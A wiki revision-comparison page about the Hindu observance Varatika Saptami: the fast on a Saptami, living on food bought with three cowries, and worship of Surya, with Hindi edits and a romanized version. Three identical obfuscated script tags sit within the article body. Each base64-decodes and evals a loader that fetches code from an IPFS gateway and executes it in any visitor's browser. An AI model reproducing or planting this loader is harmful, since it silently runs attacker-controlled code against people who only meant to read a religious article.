Difference between revisions of "वराटिका सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत किसी [[सप्तमी]] तिथि पर करना चाहिए।  
 
*यह व्रत किसी [[सप्तमी]] तिथि पर करना चाहिए।  
 
*कर्ता को केवल तीन वराटिकाओं (कौड़ियों) से क्रय किये हुए भोजन पर ही निर्वाह करना होता है, चाहे वह भोजन उसके लिए अनुचित ही क्यों न हो।
 
*कर्ता को केवल तीन वराटिकाओं (कौड़ियों) से क्रय किये हुए भोजन पर ही निर्वाह करना होता है, चाहे वह भोजन उसके लिए अनुचित ही क्यों न हो।
*[[सूर्य देवता]] की पूजा करनी चाहिए। इस व्रत का फल घोषित नहीं है। <ref>कृत्यकल्पतरु (व्रतखण्ड 184); हेमाद्रि (व्रतखण्ड 1, 726, [[भविष्यपुराण]] से उद्धरण)।</ref>
+
*[[सूर्य देवता]] की पूजा करनी चाहिए।  
 +
*इस व्रत का फल घोषित नहीं है।<ref>कृत्यकल्पतरु (व्रतखण्ड 184); हेमाद्रि (व्रतखण्ड 1, 726, [[भविष्यपुराण]] से उद्धरण)।</ref>
 
   
 
   
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:39, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat kisi saptami tithi par karana chahie.
  • karta ko keval tin varatikaoan (kau diyoan) se kray kiye hue bhojan par hi nirvah karana hota hai, chahe vah bhojan usake lie anuchit hi kyoan n ho.
  • soory devata ki pooja karani chahie.
  • is vrat ka phal ghoshit nahian hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 184); hemadri (vratakhand 1, 726, bhavishyapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>